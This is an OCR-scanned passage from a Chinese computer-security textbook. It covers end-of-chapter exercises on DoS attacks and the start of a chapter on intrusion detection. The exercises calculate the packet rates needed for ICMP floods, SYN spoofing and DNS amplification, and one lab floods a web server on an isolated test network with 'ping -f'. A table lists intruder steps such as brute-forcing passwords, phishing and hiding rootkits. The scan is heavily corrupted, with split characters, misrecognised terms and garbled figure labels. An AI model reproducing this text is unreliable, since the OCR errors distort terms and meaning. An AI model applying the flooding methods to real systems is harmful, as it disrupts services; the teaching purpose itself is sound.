有 什么 方法 可 以 被 用 来 追踪 DoS 攻击 中 所 使 用 数据 包 的 源头 ? 是 否 有 一 些 数据 包 与 其 他 数据 包 相 
比 更 容易 被 追踪 ? 


习题 


7.1 


7.2 


为 了 进行 经 典 的 DoS 洪 泛 攻击 ， 攻 击 者 必须 能 够 制造 出 足够 大 量 的 数据 包 来 占据 目标 系统 的 链 路 
容量 。 假 设 现在 有 一 个 利用 ICMP EARR (ping) 数据 包 的 DoS 攻击 ， 数 据 包 的 大 小 为 500 字 节 
(忽略 成 帧 开销 )。 对 于 一 个 使 用 0.5Mbps 带宽 链 路 的 目标 组 织 来 说 ， 攻 击 者 每 秒 钟 至 少 要 发 送 多 少 
个 数据 包 ， 才 能 进行 有 效 的 攻击 ? 在 链 路 的 带宽 为 2Mbps 和 10Mbps 的 情况 下 呢 ? 

在 TCP SYN 欺骗 攻击 中 ， 攻 击 者 目的 是 使 目标 系统 上 的 TCP 连接 请 求 表 滋 出 ， 以 致 系统 对 合法 连 
接 请 求 不 能 进行 响应 。 假 设 目标 系统 上 的 TCP 连接 请 求 表 表 项 为 256 项 ， 目 标 系统 的 每 次 超时 时 


7.3 


7.4 


75 


7.6 
7.7 


7.8 
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间 为 30 秒 ， 人 允许 超时 次 数 为 5 次 。 如 果 一 个 连接 请 求 超时 没有 应 答 ， 而 且 超 时 次 数 大 于 5， 那么 这 
个 请 求 将 会 被 从 TCP 连接 请 求 表 中 清除 。 在 没有 相关 的 应 对 措施 和 攻击 者 已 经 占 满 了 目标 系统 的 
TCP 连接 请 求 表 的 情况 下 ， 为 了 能 够 持续 占 满目 标 系统 的 TCP 连接 请 求 表 ， 攻 击 者 应 该 以 什么 样 
的 速率 发 送 TCP 连接 请 求 ? 如 果 TCP SYN 数据 包 的 大 小 为 40 字 节 (忽略 成 帧 开销 )， 那 么 攻击 者 
所 发 送 的 请 求 数据 包 将 消耗 掉 目 标 系统 多 少 带 宽 ? 

在 分 布 式 的 洪 泛 攻击 (如 习题 7.1 所 述 ) 中 ， 假 设 攻击 者 已 经 控制 了 一 定数 量 的 高 带宽 僵尸 机 ， 而 且 
每 个 僵尸 机 有 着 同样 的 网 络 上 传 带宽 128 kbps。 那 么 对 于 每 个 大 小 为 500 字 节 的 ICMP 回 送 请 求 数 
据 包 来 说 ， 单 一 的 僵尸 机 每 秒 钟 可 以 发 送 多 少 个 ?攻击 者 至 少 需要 多 少 个 这 样 的 僵尸 机 才能 有 效 洪 
泛 网 络 带 宽 分 别 为 0.5Mbps、2Mbps 和 10Mbps 的 目标 系统 ?如 果 已 知 一 个 拥有 数 千 个 僵尸 机 的 僵 
尸 网 络 的 性 能 数据 信息 ， 那 么 当 这 个 僵尸 网 络 同时 发 起 攻击 时 你 可 以 想象 到 什么 ? 或 者 想象 一 下 ， 
一 个 大 规模 的 组 织 具有 多 条 大 容量 的 链接 ， 上 述 情况 又 如 何 ? l 

为 了 进行 DNS 放大 攻击 ， 攻 击 者 必须 制造 出 足 量 的 数据 包 ， 来 触发 中 间 媒 介 产 生 大 量 的 DNS 应 答 
数据 包 给 目标 系统 ， 并 耗 尽 目标 系统 的 网 络 带宽 。 假 设 ，DNS 应 答 数据 包 的 大 小 为 500 字 节 (不 计 
头 部 )， 攻 击 者 每 秒 钟 至 少 要 使 中 间 媒 介 产 生 多 少 个 DNS 应 答 数 据 包 才 能 有 效 地 攻击 网 络 带 宽 分 别 
为 0.5Mbps、2Mbps 和 10Mbps 的 目标 系统 ? 如 果 DNS 请 求 数据 包 的 大 小 为 60 字 节 ， 那 么 对 于 上 
述 三 种 带宽 的 攻击 ， 攻 击 者 要 分 别 消耗 多 少 的 本 地 带宽 ? 

关于 对 SYN cookie 或 者 其 他 类 似 机 制 的 研究 ， 首 先 你 必须 拥有 对 某 操作 系统 (如 BSD、Linux、 
MacOSX, Solaris 或 Windows) 的 访问 权限 。 如 果 可 以 访问 ， 就 要 决定 是 否 默 认 开 启 ? 如 果 不 能 访 
问 ， 我 们 该 怎么 做 呢 ? 

调研 如 何在 路 由 器 (最 好 是 你 们 组 织 使 用 的 型 号 ) 中 实施 反 其 骗 过 滤器 和 定向 广播 过 滤器 ? 
假设 在 将 来 ， 针 对 DoS 攻击 的 安全 应 对 措施 被 广泛 地 实施 了 ， 而 且 反 欺骗 和 定向 广播 过 滤 也 被 广泛 
地 安装 了 ， 而 且 ，PC 机 和 工作 站 系统 的 安全 更 加 得 到 人 们 的 重视 了 ， 僵 尸 网 络 很 难 形成 。 那 么 服 
务 器 系统 的 管理 员 还 有 必要 关心 DoS 攻击 吗 ? MRE, DoS 攻击 会 以 什么 样 的 形式 出 现 ? 我 们 需 
要 什么 样 的 应 对 措施 ， 以 减少 其 影响 ? 

假设 你 在 一 个 网 络 实验 室 从 事 一 项 专门 的 、 独 立 的 测试 网 络 研究 ， 研 究 的 是 该 系统 的 高 流量 容量 的 
性 能 。 开 启 所 有 的 合适 Web 服务 器 (如 Apache, IIS, TinyWeb 等 )。 记 录 下 此 系统 的 IP 地 址 ， 然 
后 用 其 他 的 主机 系统 来 查询 此 系统 的 服务 器 。 首 先 确定 如 何 通 过 设置 ping 命令 参数 才能 产生 大 小 为 
1500 字 节 的 ping 数据 包 。 如 果 你 拥有 足够 权限 的 话 ， 利 用 参数 “ -f” 可 以 做 到 。 否 则 ， 确 定 如 何 
在 单位 时 间 内 产生 尽 可 能 多 的 数据 包 。 在 多 个 系统 上 同时 运行 ping 命令 ,数据 包 指向 Web 服务 器 
的 地 址 。 现 在 看 看 在 服务 器 上 对 于 这 些 数据 包 有 些 什么 反应 。 然 后 ， 启 用 更 多 的 主机 系统 ， 直 到 响 
应 变 慢 以 致 无 反应 。 值 得 注意 的 是 ， 由 于 攻击 源 、 查 询 系统 和 目标 系统 都 在 同一 个 LAN 上 ， 相 当 
高 的 数据 包 速 率 是 造成 问题 所 必需 的 。 如 果 你 的 网 络 实验 室 拥 有 合适 的 设备 器 材 来 完成 的 话 ， 可 以 
尝试 一 下 ,将 攻击 系统 和 查询 系统 放 在 不 同 于 目标 系统 的 局 域 网 上 ， 而 且 在 这 两 个 局 域 网 之 间 的 链 
路 容量 相对 较 低 ， 这 样 的 话 ， 所 需要 的 攻击 系统 数量 可 以 大 大 减少 。 你 也 能 够 模仿 [DAMO12] 中 提 
供 的 练习 ， 利 用 Slowloris 和 RUDY 来 研究 应 用 程序 级 的 DoS 攻击 。 
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入 侵 检 测 





学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 区 别 不 同类 型 的 入 侵 者 行为 模式 ; 

© 理解 入 侵 检 测 的 基本 原理 和 要 求 ; 
论述 基于 主机 的 入 侵 检 测 的 关键 特性 ; 


解释 分 布 式 基于 主机 的 入 侵 检测 的 概念 ; 
论述 基于 网 络 的 入 侵 检 测 的 关键 特性 
定义 入 侵 检 测 交换 格式 ; 
解释 密 欠 的 作用 ; 

概述 Snort。 


对 于 联网 的 系统 来 说 ， 一 个 重要 的 安全 问题 是 由 用 户 或 软件 引起 的 恶意 或 者 至 少 是 不 期 户 
发 生 的 非法 和 人 侵 。 用 户 非法 入侵 可 能 采用 的 方式 是 在 未 经 授权 的 情况 下 登录 计算 机 ， 也 可 能 是 
已 授权 用 户 非法 获取 更 高 级 别 的 权限 或 进行 其 权限 以 外 的 操作 。 软 件 非法 入 侵 可 能 采取 的 方式 
有 病毒 、 蠕 虫 或 特洛伊 木马 程序 等 。 

本 章 主要 对 入 侵 这 个 主题 进行 讨论 。 在 后 续 章 节 中 ， 我 们 将 讨论 其 他 形式 的 攻击 。 首 先 ， 
我 们 研究 人 侵 者 的 实质 及 他 们 是 如 何 进行 攻击 的 ， 然 后 讨论 检测 人 侵 的 策略 。 


8.1 入 侵 者 


入 侵 者 对 于 某 些 形式 的 黑客 技术 的 使 用 是 关键 的 安全 威胁 之 一 ， 这 里 的 入 侵 者 通常 指 的 是 
黑客 或 者 破解 者 。 威 瑞 森 (Verizon) [VERI13] 根据 他 们 所 做 的 调查 ， 指 出 92% 的 破坏 是 由 外 
部 人 员 造 成 的 ，14% 是 内 部 人 员 所 为 ， 其 中 某 些 破坏 同时 涉及 外 部 人 员 和 内 部 人 员 ; 他 们 还 指 
出 内 部 人 员 应 该 对 少数 非常 大 的 数据 集 损坏 负责 。 赛 门 铁 克 ( SYMA13 ) 和 威 瑞 森 (VERI13 ) 
同时 还 指出 ， 不 但 恶意 黑客 行为 在 普遍 增加 ， 而 且 针对 组 织 中 的 个 人 及 他 们 使 用 的 IT 系统 的 
攻击 也 在 增加 。 这 种 趋势 凸显 了 使 用 深度 防御 策略 的 必要 性 ， 因 为 这 类 有 目标 的 攻击 可 能 有 专 
门 的 设计 来 绕 过 诸如 防火 墙 和 基于 网 络 的 人 侵 检测 系统 (IDS) 之 类 的 边界 防御 。 

就 任何 一 种 防御 策略 而 言 ， 对 于 攻击 者 可 能 的 动机 的 理解 ， 将 有 助 于 设计 合适 的 防御 策 





”上 略 。 另 外 ， 赛 门 铁 克 (SYMA13 ) 和 威 瑞 森 (VERI13 ) 也 给 出 了 关于 入侵 者 的 粗略 的 分 类 : 


o 网络 罪 犯 (cyber criminal): 他 们 是 个 人 或 者 以 金钱 回报 为 目的 的 犯罪 组 织 的 成 员 。 为 
了 达到 获 利 的 目的 ， 他 们 的 行为 可 能 包括 身份 窃取 、 金 融 凭 证 窃取 、 公 司 间 谍 、 数 据 
窃取 或 者 数据 勒索 。 他 们 通常 很 年 轻 ， 一 般 在 网 络 上 进行 交易 [ANTE06]。 他 们 一 般 是 
东欧 、 俄 罗斯 或 者 东南 亚 的 黑客 ， 在 像 DarkMarket.org 或 theftservices.com 这 样 的 地 下 
论坛 会 面 、 交 流 心 得 、 买 卖 数 据 和 合作 攻击 。 不 少 诸如 [SYMA13] 这 样 的 年 度 报告 已 
经 说 明了 这 类 网 络 犯罪 行为 导致 的 巨大 且 还 在 增长 的 损失 ， 因 此 有 必要 采取 措施 来 解 
决 这 类 威胁 。 

© 活动 家 (activist): 他 们 通常 是 工作 在 内 部 的 个 人 ， 或 者 更 大 的 外 部 攻击 者 组 织 的 一 员 。 
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他 们 的 动机 通常 是 社会 或 者 政治 事业 。 他 们 也 作为 黑客 主义 者 而 为 人 们 所 熟知 ， 但 技 
能 水 平 通常 很 低 。 他 们 攻击 的 目的 主要 是 促进 和 宣传 他 们 的 事业 ， 通 常 采 取 的 手段 是 
破坏 网 站 、 拒 绝 服务 攻击 、 窃 取 和 散布 能 导致 攻击 目标 妥协 或 者 对 其 进行 负面 宣传 的 
数据 等 。 最 近 众 所 周知 的 例子 包括 Anonymous 和 LulzSec 等 组 织 从 事 的 活动 、 切 尔 西 
(从 前 叫 布 兰 德 利 ). BT (Chelsea Manning) 和 爱德华 . 斯 诺 登 ( Edward Snowden) 从 
事 的 活动 。 

e 国家 资助 的 组 织 (state-sponsored organization): 他 们 是 由 政府 所 资助 的 黑客 组 织 ， 目 的 
是 进行 谍报 或 者 破坏 活动 。 这 类 活动 就 是 人 们 所 熟知 的 高 级 持续 威胁 CAPT) 活动 ， 隐 
蔽 性 和 长 期 的 持续 性 是 许多 这 类 攻击 的 重要 特性 。 

o 其 他 (other): 他 们 是 以 上 未 列 出 的 以 其 他 目的 为 动机 的 黑客 ， 包 括 用 技术 挑战 同行 以 
获取 尊敬 和 名 声 为 目的 的 典型 黑客 ， 以 及 那些 负责 寻找 新 的 缓冲 区 溢出 漏洞 [MEER10] 
的 黑客 。 另 外 ， 由 于 攻击 工具 的 广泛 可 用 性 ， 还 有 一 类 “嗜好 性 黑客 ”(hobby hacker), 
他 们 使 用 这 些 工具 来 探究 系统 和 网 络 的 安全 性 ， 他 们 是 上 面 那 几 类 黑客 的 潜在 的 新 生 
力量 。 

除了 上 面 这 种 分 类 ， 还 可 以 根据 入 侵 者 的 技术 水 平 将 他 们 分 为 如 下 几 类 : 

e 学 徒 (apprentice) : 他 们 是 那些 拥有 最 低 技术 水 平 的 黑客 ， 仪 仅 会 使 用 现 有 的 攻击 工具 
包 。 他 们 很 可 能 在 攻击 者 中 占 最 大 比例 ， 包 括 了 许多 犯罪 者 和 活动 家 黑客 。 考 虑 到 他 
们 使 用 现 有 的 攻击 工具 ， 因 此 这 些 攻 击 者 也 非常 容易 防御 。 因 为 他 们 使 用 现 有 的 脚本 
(工具 )， 所 以 人 们 也 称 他 们 为 “脚本 小 子 ”(script-kiddy ) 。 

© 训练 有 素 者 (jouneyman): 他 们 是 那些 拥有 足够 技术 的 黑客 ， 可 以 修改 和 扩展 攻击 工 
具 来 使 用 新 发 现 的 或 者 购买 的 漏洞 ， 攻 击 不 同 的 目标 组 织 。 他 们 也 可 能 发 现 和 利用 与 
已 知 漏洞 类 似 的 新 漏洞 。 许 多 有 这 些 技能 的 黑客 可 以 调整 攻击 工具 为 他 人 使 用 ， 并 且 
他 们 存在 于 上 面 列 出 的 各 类 入 侵 者 中 。 攻 击 工具 的 改变 会 使 识别 和 防御 这 些 攻击 更 加 
困难 。 

© 高 手 (master): 他 们 是 那些 拥有 高 级 技术 的 黑客 ， 有 能 力 发 现 标志 性 的 新 漏洞 ， 或 者 
编写 全 新 的 强力 攻击 工具 包 。 一 些 知名 黑客 都 可 以 归 为 这 一 类 ， 很 显然 ， 他 们 中 的 一 
部 分 人 会 被 某 些 政府 组 织 所 雇用 ， 从 事 APT 攻击 活动 。 这 使 防御 这 类 攻击 最 为 困难 。 

人 侵 者 的 攻击 可 能 是 无 恶意 的 ， 也 可 能 是 有 恶意 的 。 无 恶意 攻击 是 指 人 们 仅仅 希望 探索 一 

下 互联 网 ， 看 看 那里 到 底 是 什么 。 而 恶意 攻击 则 是 指 某 些 个 人 试图 读 取 一 些 特权 数据 ， 在 未 经 
授权 的 情况 下 对 数据 进行 修改 ， 或 者 破坏 系统 。 

[CICH12] 列 出 了 以 下 一 些 人 侵 实例 : 

© 远程 获得 电子 邮件 服务 器 超级 用 户 (root) 权限 。 

© 破坏 Web 服务 器 。 

e 猜测 和 破解 密码 。 

e 复制 一 个 存 有 信用 卡 账号 的 数据 库 。 

e 在 未 授权 的 情况 下 浏览 敏感 数据 ， 包 括 工 资 记录 和 医疗 信息 等 。 

e 在 工作 站 上 运行 数据 包 嗅 探 器 来 捕获 用 户 名 和 密码 。 

© 利用 匿名 FTP 服务 器 的 权限 错误 (permission error) 发 送 盗版 的 软件 和 音乐 文件 。 

© 拨号 到 一 个 不 安全 的 调制 解 调 器 ， 以 获得 内 网 的 访问 权限 。 

e 伪装 成 管理 人 员 ， 呼 叫 帮助 平台 ， 重 置 该 管理 人 员 的 电子 邮件 口令 并 学 习 新 的 口令 。 

e 在 未 授权 的 情况 下 使 用 一 个 无 人 值守 的 已 登录 的 工作 站 。 

本 章 和 第 9 章 分 别 描述 的 人 侵 检 测 系统 (IDS) 和 入 侵 防 护 系 统 (IPS) 就 是 用 来 应 对 这 些 
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威胁 的 。 它 们 能 够 相当 有 效 地 对 抗 已 知 的 、 低 复杂 度 的 攻击 ， 比 如 那些 活动 家 组 织 的 攻击 ， 或 
者 大 规模 的 电子 邮件 诈骗 等 。 它 们 面 对 由 一 些 罪 犯 或 者 政府 支持 的 人 侵 者 所 发 起 的 更 为 复杂 
的 、 有 目标 的 攻击 则 可 能 比较 低 效 ， 这 是 由 于 这 些 攻 击 更 可 能 使 用 新 的 、0-day 漏洞 ， 从 而 让 
他 们 在 目标 系统 上 的 活动 变 得 隐秘 。 因 此 ， 需 要 一 部 分 深度 防御 策略 ， 包 括 敏感 信息 和 详细 的 
审计 迹 加 密 、 强 认证 和 授权 控制 、 操 作 系统 和 应 用 程序 安全 的 主动 管理 。 


8.1.1 ”入侵 者 行为 


人 和 人 侵 者 的 技术 和 行为 模式 总 是 在 不 断 变化 ， 目 的 是 利用 新 发 现 的 系统 弱点 并 躲避 检测 


和 相应 的 应 对 策略 。 然 而 ， 和 人 侵 者 通常 还 总 是 使 用 常规 的 攻击 方法 中 的 某 些 步骤 发 起 攻击 。 
[MCCL12] 详细 讨论 了 与 以 下 步骤 相关 的 活动 : 


e 锁定 目标 和 收集 信息 : 在 该 步骤 中 ， 攻 击 者 利用 公开 的 可 用 信息 ， 通 过 技术 和 非 技术 
手段 ， 发 现 待 攻击 的 目标 系统 ， 归 纳 其 特征 ， 并 且 利 用 网 络 探测 工具 确定 目标 资源 的 
位 置 。 

e 获取 访问 权限 : 攻击 者 如 果 要 获取 对 目标 系统 的 访问 权限 ,通常 是 利用 我 们 将 在 第 10 
BAS 11 章 讨论 的 远程 网 络 漏洞 ， 或 者 是 猜测 在 第 3 章 讨论 过 的 在 远程 服务 中 使 用 的 
弱 认 证 证 书 , 或 者 是 利用 在 第 6 章 讨论 过 的 基于 社会 工程 学 或 夹带 式 下 载 攻击 手段 在 
目标 系统 上 安装 恶意 软件 。 

o 权限 提升 : 发 生 在 系统 上 的 这 类 行为 ， 通 常 是 利用 一 个 本 地 的 访问 漏洞 来 提升 攻击 者 
的 权限 ， 进 而 使 其 可 以 在 目标 系统 上 完成 他 们 想 做 的 攻击 ， 我 们 将 在 第 10 章 和 第 11 
章 讨论 这 类 问题 。 

。 信息 收集 或 者 系统 漏洞 利用 : 攻击 者 的 这 类 行为 是 指 访问 或 者 修改 目标 系统 中 的 信息 
或 者 资源 ， 或 者 从 目标 系统 导航 到 另 一 个 目标 系统 。 

e 维持 访问 权限 : 这 类 行为 是 指 我 们 在 第 6 章 讨论 过 的 攻击 者 安装 后 门 或 者 其 他 恶意 软 
件 ， 或 者 改变 认证 证 书 ， 或 者 改变 系统 的 其 他 配置 ， 从 而 使 攻击 者 在 首次 获得 访问 权 
限 后 ， 可 以 保证 其 拥有 后 续 的 长 期 访问 权限 。 

。 覆盖 痕迹 : 这 是 指 我 们 将 在 第 18 章 讨 论 的 ， 攻 击 者 破坏 或 者 修改 审计 日 志 来 消除 掉 攻 
击 活动 的 证 据 ， 或 者 使 用 工具 包 或 其 他 措施 来 隐藏 悄悄 安装 的 文件 或 代码 ， 这 一 点 我 
们 在 第 6 章 已 经 有 所 讨论 。 

表 8-1 列 出 了 一 些 与 以 上 步骤 相关 的 行为 实例 。 


表 8-1 入 侵 者 的 行为 模式 的 一 些 实例 


a) 锁定 目标 和 收集 信息 


探测 公司 网 站 来 获取 相关 信息 ， 例 如 公司 组 织 结构 、 人 员 、 关 键 系统 ， 以 及 网 站 服务 器 和 采用 的 操作 系统 等 


细节 。 

使 用 DNS 查询 工具 收集 目标 网 络 的 相关 信息 ， 这 些 查 询 工具 包括 dig、host 等 ， 或 者 查询 WHOIS 数据 库 。 
使 用 诸如 NMAP 这 样 的 工具 来 扫描 网 络 ， 获 得 可 以 访问 的 服务 。 

发 送 一 封 查询 类 的 电子 邮件 到 客户 服务 部 门 ， 根 据 回复 来 得 到 邮箱 客户 端 、 服 务 器 、 操 作 系统 等 信息 ， 甚 至 
可 以 得 到 回复 者 本 人 的 一 些 个 人 信息 。 

确定 潜在 的 有 漏洞 的 服务 ， 例 如 有 漏洞 的 Web 内 容 管理 系统 (Web CMS). 


b) 获 取 访 问 权 限 


蛮 力 猜 解 某 用 户 的 Web 内 容 管 理 系 统 (CMS) 的 密码 。 
利用 Web CMS 插件 的 漏洞 来 获取 系统 访问 权限 。 
发 送 带 有 恶意 链接 的 钓鱼 邮件 给 某 些 关 键 人 员 。 
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( 续 ) 


c) 权限 提升 


扫描 系统 来 寻找 可 以 发 起 本 地 攻击 的 应 用 程序 。 
攻击 任意 一 个 带 漏洞 的 程序 来 获得 高 级 访问 权限 。 
安装 嗅 探 程序 来 捕获 管理 员 密 码 。 

利用 捕获 到 的 管理 员 密 码 来 访问 特权 信息 。 


d) 信息 收集 或 者 系统 漏洞 利用 


扫描 文件 来 寻找 想 要 的 信息 。 

将 大 量 的 文档 传送 到 外 部 。 

使 用 猜测 的 或 者 捕获 的 密码 来 访问 网 络 中 的 其 他 服务 器 。 
e) 维持 访问 权限 

安装 远程 管理 工具 或 者 带 后 门 的 rootkit 以 方便 以 后 的 访问 。 

在 以 后 对 网 络 进行 访问 时 使 用 管理 员 密码 。 

修改 或 者 破坏 系统 上 运行 的 反 病 毒 程序 或 者 IDS 程序 。 


f) 覆盖 痕迹 


© 使 用 rootkit 隐藏 安装 在 系统 中 的 文件 。 
© 编辑 日 志文 件 来 移 除 人 侵 过 程 中 生成 的 相关 记录 。 


8.2 ”入侵 检测 
下 面 的 定义 与 我 们 接 下 去 的 讨论 相关 ， 这 些 定义 来 源 于 RFC 2828 (Intemet 安全 术语 表 )。 


REAR: 一 个 安全 事件 或 多 个 安全 事件 的 组 合 构 成 一 个 安全 事故 (security incident)， 在 
安全 事故 中 入 侵 者 在 未 经 授权 的 情况 下 获取 或 尝试 获取 一 个 系统 (或 系统 资源 ) 的 访问 权 。 


入 侵 检测 : 一 种 监控 并 分 析 系 统 事 件 的 安全 服务 ,目标 是 发 现 未 经 授权 而 访问 系统 资源 的 
尝试 活动 ， 并 提供 实时 或 近似 实时 的 报警 。 


IDS 包括 三 个 逻辑 组 件 : 
© 传感器 (sensor): 传感器 负责 收集 数据 。 传 感 器 的 输入 可 以 是 包含 人 侵 证 据 的 系统 的 
任何 一 部 分 。 传 感 器 输入 的 类 型 包括 网 络 数据 包 、 日 志文 件 和 系统 调用 迹 。 传 感 器 收 
集 并 向 分 析 器 转发 这 些 信 息 。 
o 分 析 器 (analyzer): 分 析 器 从 一 个 或 多 个 传感器 或 其 他 分 析 器 接收 输入 。 分 析 器 负责 确 
定 是 否 发 生 了 入 侵 。 此 组 件 的 输出 表明 是 否 发 生 了 入 侵 。 输 出 可 以 包含 支持 入 侵 发 生 
这 一 结论 的 证 据 。 分 析 器 可 以 提供 指导 ， 用 于 判断 什么 活动 是 人 侵 导致 的 。 传 感 器 的 
输入 也 可 以 被 存储 起 来 用 于 将 来 的 分 析 ， 这 些 输 入 可 以 在 存储 器 或 者 数据 库 组 件 中 进 
行 检查 。 
e 用 户 接口 (user interface): IDS 的 用 户 接口 使 用 户 能 够 查看 系统 输出 或 控制 系统 的 行为 。 
在 某 些 系 统 ， 用 户 接口 可 以 被 看 作 是 经 理 、 主 管 或 者 控制 台 组 件 。 
IDS 可 以 只 使 用 一 个 传感器 和 分 析 器 ， 例 如 典型 的 一 台 主 机 上 的 HIDS 或 者 一 个 防火 墙 设 
备 上 的 NIDS。 更 为 复杂 的 IDS 可 以 在 主机 或 者 网 络 设备 上 使 用 多 个 传感器 ， 并 发 送信 息 到 一 
个 中 心 分 析 器 和 一 个 分 布 式 结构 的 用 户 接口 。 
IDS 可 被 分 为 如 下 几 类 : 
e 基于 主机 的 IDS (HIDS): 监测 一 台 主 机 的 特征 和 该 主机 发 生 的 与 可 疑 活动 相关 的 事件 ， 
例如 进程 识别 器 、 进 程 产生 的 系统 调用 等 ， 用 作 可 疑 活动 的 证 据 。 
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e 基于 网 络 的 IDS (NIDS): 监测 特定 的 网 段 或 设备 的 流量 并 分 析 网 络 、 传 输 和 应 用 协议 ， 
用 以 识别 可 疑 的 活动 。 

e 分 布 式 或 混合 式 IDS : 通常 是 将 主机 的 传感器 和 网 络 的 传感器 收集 到 的 信息 相 结合 ， 
并 汇总 到 一 个 中 央 分 析 器 中 ， 这 样 能 够 更 好 地 识别 人 侵 活 动 并 做 出 响应 。 


8.2.1 基本 原理 


身份 认证 设备 、 访 问 控制 设施 和 防火 墙 在 阻 断 和 人 侵 方面 都 起 到 了 一 定 的 作用 。 另 一 道 防 线 
是 人 侵 检 测 ， 它 也 是 近年 来 许多 研究 的 热点 。 使 得 入 侵 检测 成 为 研究 热点 的 原因 主要 表现 在 : 

1. 如 果 能 快速 地 检测 到 入 侵 ， 就 可 以 在 损害 发 生 或 者 数据 受到 威胁 之 前 ， 将 入侵 者 识别 出 
来 并 将 其 逐 出 系统 。 即 使 未 能 及 时 地 检测 出 人 侵 者 ， 但 越 早 检测 到 入 侵 ， 则 对 系统 造成 的 损失 
越 小 ， 而 且 越 容易 进行 快速 的 恢复 。 

2. 有 效 的 IDS 可 以 作为 一 个 威慑 ， 从 而 达到 阻止 人 侵 的 目的 。 

3. 人 侵 检 测 可 以 收集 关于 入 侵 技 术 的 信息 ， 用 于 增强 人 侵 防 护 系统 的 防护 能 力 。 

入 侵 检测 基于 如 下 假设 : 人 侵 者 的 行为 和 合法 用 户 的 行为 之 间 存 在 可 以 量化 的 差别 。 当 
然 ， 我 们 不 能 期 望 人 侵 者 的 攻击 和 一 个 授权 用 户 对 资源 的 正常 使 用 之 间 有 清晰 、 精 确 的 区 分 。 
事实 上 ,我 们 认为 两 者 之 间 会 有 一 些 重 释 的 部 分 。 

图 8-1 抽象 地 指出 这 样 一 个 本 质 : 检测 任务 和 入 侵 检测 系统 的 设计 者 的 期 望 永 远 是 对 立 
的 。 尽 管 人 侵 者 的 典型 行为 与 授权 用 户 的 典型 行为 不 同 ， 但 这 些 行为 间 仍 有 重合 部 分 。 因 此 ， 
如 果 对 入 侵 者 行为 的 定义 过 于 宽松 ， 虽 然 能 够 发 现 更 多 的 人 侵 者 ， 但 是 也 容易 导致 大 量 的 误 报 
(false positive)， 即 将 授权 用 户 误 认 为 人 侵 者 。 相 反 ， 如 果 对 人 侵 者 行为 的 定义 过 于 严格 ， 这 将 

[273] 导致 漏 报 (false negative) 增加 ， 可 能 漏 过 真实 的 人 侵 者 。 因 此 ， 人 侵 检测 系统 的 实践 是 一 门 
折 中 的 艺术 。 检 测 率 是 指 被 检测 到 的 攻击 在 所 有 攻击 中 所 占 的 比例 ， 误 报 率 是 指 误 报 数量 在 正 
常 使 用 中 所 占 的 比例 。 理 想 状态 下 ， 我 们 的 期 望 是 IDS 拥有 较 高 的 检测 率 ， 与 此 同时 ， 误 报 
率 尽 可 能 小 。 


ar 授权 用 户 


ARE 行为 曲线 
行为 曲线 







观测 行为 与 预 
期 行为 的 重 秋 


ARF 授权 用 户 可 测 行 
行为 均值 行为 均值 为 参数 


图 8-1 入侵 者 和 授权 用 户 的 行为 曲线 


在 Anderson 的 一 项 重要 的 早期 研究 [ANDE80] 中 ， 假 定 某 个 系统 能 够 合理 确定 外 部 攻 
击 者 与 合法 用 户 之 间 的 区 别 。 合 法 用 户 的 行为 模式 可 以 通过 观察 合理 的 历史 行为 记录 建立 起 
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来 ， 与 这 样 的 模式 有 显著 差异 的 行为 能 够 被 检测 出 来 。Anderson 指出 ， 检 测 内 部 攻击 者 E 
法 用 户 以 非 授权 的 方式 执行 操作 ) 将 困难 得 多 ， 因 为 此 时 异常 和 正常 行为 的 差异 可 能 会 很 小 。 
Anderson 总 结 认为 仅 通过 查找 异常 行为 不 能 检测 出 这 种 违规 使 用 。 但 通过 巧妙 地 定义 表示 非 
授权 使 用 的 条 件 集 ， 仍 然 可 能 检测 到 违法 者 。 这 些 结论 在 1980 年 得 出 ， 至 今 仍然 使 用 。 


8.2.2 BBR 


为 了 实用 性 ，IDS 应 该 能 检测 到 绝 大 多 数 的 人 侵 ， 同 时 保持 可 接受 级 别 的 误 报 率 。 如 果 只 
检测 到 有 限 比例 的 实际 人 侵 ， 则 系统 给 人 以 安全 的 假象 。 另 一 方面 ， 如 果 系 统 在 没有 人 侵 的 时 
候 频 繁 报警 〈 误 报 )， 则 系统 管理 员 要 么 开始 忽略 报警 ， 要 么 浪费 很 多 时 间 分 析 误 报 。 

遗憾 的 是 ， 由 于 所 涉及 的 概率 性 质 ， 很 难 同时 满足 具有 高 检测 率 和 低 误 报 率 的 标准 。 一 般 
来 讲 ， 如 果实 际 人 侵 数 比 系统 的 合法 使 用 数 低 ， 则 误 报 率 将 很 高 ， 除 非 测试 用 例 是 很 容易 区 别 
的 。 这 是 基 率 谬误 现象 的 一 个 实例 。[AXEL00] 对 已 有 的 IDS 进行 了 研究 ， 指 出 当前 入 侵 检测 
系统 不 能 解决 基 率 廖 误 的 问题 。 请 参阅 附录 J 关于 此 数学 问题 的 简要 背景 介绍 。 


8.2.3 BR 


[BALA98] 列 出 理想 的 IDS 必须 满足 的 条 件 如 下 : 

© 能 够 不 间断 地 运行 ， 而 且 人 的 参与 尽 可 能 少 。 

e 具有 容错 功能 ， 系 统 崩 溃 时 ， 它 必须 能 够 很 快 恢 复 和 重新 初始 化 。 

e 抵御 破坏 。IDS 必须 能 够 监测 自身 ， 检 测 是 否 已 被 攻击 者 修改 。 

e 对 于 正 运行 的 系统 增加 最 小 的 开销 。 

e 能 够 根据 被 监测 系统 的 安全 策略 进行 配置 。 

o 能 够 自动 适应 系统 和 用 户 行为 变化 。 

© 能 够 扩展 以 监测 更 多 的 主机 。 

o 能 够 提供 很 好 的 服务 降级 ， 也 就 是 说 ， 如 果 IDS 的 某 些 组 件 停止 工作 ， 无 论 出 于 何 种 
原因 ， 其 余部 分 应 受到 尽 可 能 少 的 影响 。 

e 允许 动态 重新 配置 ， 即 能 够 重新 配置 IDS， 而 不 必 重 新 启动 。 


8.3 分析 方法 


IDS 通常 使 用 以 下 几 种 方法 之 一 来 分 析 传 感 器 得 到 的 数据 进而 检测 人 侵 ;: 

1. 异常 检测 (anomaly detection): 采集 有 关 合法 用 户 在 某 段 时 间 内 的 行为 数据 ， 然 后 统计 
检验 被 监测 的 行为 ， 以 较 高 的 置信 度 确 定 该 行为 是 否 不 是 合法 用 户 的 行为 。 

2. 特征 或 启发 式 检测 (signature or heuristic detection): 使 用 一 组 已 知 恶 意 数据 模式 (特征 ) 
或 者 攻击 规则 (启发 式 ) 组 成 的 集合 来 与 当前 的 行为 进行 比较 ， 最 终 确定 这 是 否 是 一 个 人 侵 者 。 
这 种 方法 也 被 称 为 误 用 检测 ， 事 实 上 ， 它 仅仅 可 以 被 用 来 识别 有 模式 或 者 有 规则 的 已 知 攻击 。 

